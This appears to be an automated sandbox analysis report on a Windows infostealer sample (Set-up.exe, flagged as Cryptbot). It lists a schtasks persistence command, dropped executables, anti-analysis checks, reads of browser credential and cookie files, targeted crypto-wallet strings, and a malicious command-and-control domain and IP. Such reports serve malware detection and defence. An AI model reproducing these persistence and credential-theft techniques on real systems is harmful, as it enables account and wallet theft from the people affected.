Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ehmlfmzycqqvkbieuybc.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ehmlfmzycqqvkbieuybc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ehmlfmzycqqvkbieuybc.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Set-up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exe Static file information: File size 6614719 > 1048576
Source: Set-up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x476600
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B8370 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_004B8370
PE file contains sections with non-standard names
Source: Set-up.exe Static PE information: section name: /4
Source: Set-up.exe Static PE information: section name: /14
Source: Set-up.exe Static PE information: section name: /29
Source: Set-up.exe Static PE information: section name: /41
Source: Set-up.exe Static PE information: section name: /55
Source: Set-up.exe Static PE information: section name: /67
Source: Set-up.exe Static PE information: section name: /80
Source: Set-up.exe Static PE information: section name: /91
Source: Set-up.exe Static PE information: section name: /102
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ehMlFMzYcqQvKbiEUyBC.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004BB11B push eax; iretd 4_2_004BB171
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C360C20 push eax; mov dword ptr [esp], ebx 4_2_6C360E46
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3C0DD8 push edx; mov dword ptr [esp], edi 4_2_6C3C0FCF
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C37ADC0 push eax; mov dword ptr [esp], ebx 4_2_6C37B19B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C36CF10 push eax; mov dword ptr [esp], ebx 4_2_6C36D180
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C36CF10 push edx; mov dword ptr [esp], ebx 4_2_6C36D19A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C354F81 push eax; mov dword ptr [esp], ebx 4_2_6C354FA7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C354FE0 push eax; mov dword ptr [esp], ebx 4_2_6C3555D7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C35284A push eax; mov dword ptr [esp], esi 4_2_6C35285B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C386900 push eax; mov dword ptr [esp], esi 4_2_6C3BF741
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3549B0 push eax; mov dword ptr [esp], ebx 4_2_6C354FA7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C384980 push eax; mov dword ptr [esp], esi 4_2_6C3BF741
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C340A30 push eax; mov dword ptr [esp], ebx 4_2_6C340A44
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C313FBA push eax; mov dword ptr [esp], ebx 4_2_6C3C0B12
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C313FBA push eax; mov dword ptr [esp], ebx 4_2_6C3C0B12
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C342AE8 push edx; mov dword ptr [esp], ebx 4_2_6C342AFC
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C318438 push eax; mov dword ptr [esp], ebx 4_2_6C3C0B12
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C36A470 push eax; mov dword ptr [esp], ebx 4_2_6C36A59D
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C344479 push eax; mov dword ptr [esp], ebx 4_2_6C34448D
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3804B0 push eax; mov dword ptr [esp], ebx 4_2_6C3809D2
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3544AD push eax; mov dword ptr [esp], ebx 4_2_6C3544C1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C338484 push edx; mov dword ptr [esp], ebx 4_2_6C338498
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3524D4 push ecx; mov dword ptr [esp], ebx 4_2_6C352505
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3524CA push ecx; mov dword ptr [esp], ebx 4_2_6C352505
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3565B0 push eax; mov dword ptr [esp], ebx 4_2_6C3565D8
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3545DA push eax; mov dword ptr [esp], ebx 4_2_6C3545EB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C336667 push edx; mov dword ptr [esp], ebx 4_2_6C33667B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C344669 push eax; mov dword ptr [esp], ebx 4_2_6C34467D
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C35272E push eax; mov dword ptr [esp], ebx 4_2_6C352742
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C386710 push eax; mov dword ptr [esp], esi 4_2_6C3BF741
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C358190 push eax; mov dword ptr [esp], ebx 4_2_6C3583DF
Drops PE files
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\ehMlFMzYcqQvKbiEUyBC.dll Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\Set-up.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 884 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Set-up.exe TID: 7408 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7860 Thread sleep count: 884 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7860 Thread sleep time: -88400s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: Set-up.exe, 00000000.00000003.2040016353.000000000131F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2261326166.000000000131F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2261326166.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766684688.000000000131F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.2040016353.000000000131F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2261326166.000000000131F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766684688.000000000131F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWg
Source: Set-up.exe Binary or memory string: BFastStoneLenovoServiceBridgeVMwareFree_PDF_SolutionsPublicContinuous MigrationSnapshotsSystem Profile
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B8370 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_004B8370
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B117C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 4_2_004B117C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B1170 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_004B1170
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B13D1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 4_2_004B13D1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B11B3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_004B11B3
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C374010 cpuid 4_2_6C374010
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Set-up.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 4.2.service123.exe.6c2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2245373256.0000000003E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 7856, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7328, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: #@com.adobe.dunamisMacromediaUserBenchmarkOpera Software\Opera Crypto StableFeedsvivaldi.exeZoomWalletsStreamingVideoProviderBraavos Smart WalletThinkBuzanDRPSuSUPERAntiSpywareDriverPack CloudCacheCode Cacheblob_storagevcpkgIntelexodusexchangeElectrumGraineSearches\ProfilesRoaming\...KeepSolid Incnkbihfbeogaeaoehlefnkodbefgpgknnsollink.txt.rtf.xls.pdf.docXuanZhi9XuanZhiMaxonBlueStacks X
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: VSApplicationInsights\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)productionpreferencespkgsSavesMusic3D Objectsadspower_globalNVIDIA Corporation\Riot Games\ViberPC
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: VSApplicationInsights\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)productionpreferencespkgsSavesMusic3D Objectsadspower_globalNVIDIA Corporation\Riot Games\ViberPC
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: zcodecom.liberty.jaxxDisc_Soft_FZE_LLCwebview2Rockstar GamesCaphyoncwd_globalJavaScriptPCHealthCheck
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: C}%D}Crystal Dynamicsatomic\Storage\Exodus\OneDrive\
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: #@com.adobe.dunamisMacromediaUserBenchmarkOpera Software\Opera Crypto StableFeedsvivaldi.exeZoomWalletsStreamingVideoProviderBraavos Smart WalletThinkBuzanDRPSuSUPERAntiSpywareDriverPack CloudCacheCode Cacheblob_storagevcpkgIntelexodusexchangeElectrumGraineSearches\ProfilesRoaming\...KeepSolid Incnkbihfbeogaeaoehlefnkodbefgpgknnsollink.txt.rtf.xls.pdf.docXuanZhi9XuanZhiMaxonBlueStacks X
Source: Set-up.exe, 00000000.00000000.1658756055.000000000087A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: H11.0.2PhotoWorksFPSChessActivisiondotnetWindows 2000 %wSVirtualBoxsyncpedapocogameLedger Live\microAppsejbalbakoplchlghecdalmeeeajnimhmOpera Beta.androidOpera CryptotdummyemojiEMPRESSTSMonitorBitTorrentBitTorrentHelpermentalmentorwallethtxmetaTaskSchedulerConfigPenWorkspacePlayReadyTreexyWeb DataCookiesbhhhlbepdkbapadjdnnojkbgioiodbicEthereum (UTC)wallet_dat3
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7328, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7328, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520814 Sample: Set-up.exe Startdate: 28/09/2024 Architecture: WINDOWS Score: 100 28 twelvevh12pt.top 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 5 other signatures 2->42 8 Set-up.exe 4 2->8         started        13 service123.exe 2->13         started        15 service123.exe 2->15         started        signatures3 process4 dnsIp5 30 twelvevh12pt.top 185.244.181.140, 49730, 49731, 49733 BELCLOUDBG Russian Federation 8->30 24 C:\Users\user\AppData\...\service123.exe, PE32 8->24 dropped 26 C:\Users\user\...\ehMlFMzYcqQvKbiEUyBC.dll, PE32 8->26 dropped 44 Found many strings related to Crypto-Wallets (likely being stolen) 8->44 46 Uses schtasks.exe or at.exe to add and modify task schedules 8->46 48 Tries to harvest and steal browser information (history, passwords, etc) 8->48 50 Drops large PE files 8->50 17 service123.exe 8->17         started        20 schtasks.exe 1 8->20         started        file6 signatures7 process8 signatures9 32 Found evasive API chain (may stop execution after checking mutex) 17->32 34 Found stalling execution ending in API Sleep call 17->34 22 conhost.exe 20->22         started        process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.244.181.140
 twelvevh12pt.top Russian Federation
44901 BELCLOUDBG true

Contacted Domains

Name IP Active
twelvevh12pt.top 185.244.181.140 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
analforeverlovyu.top true
  • URL Reputation: safe
 unknown
+twelvevh12pt.top true
    		unknown
    twelvevh12pt.top true
      		unknown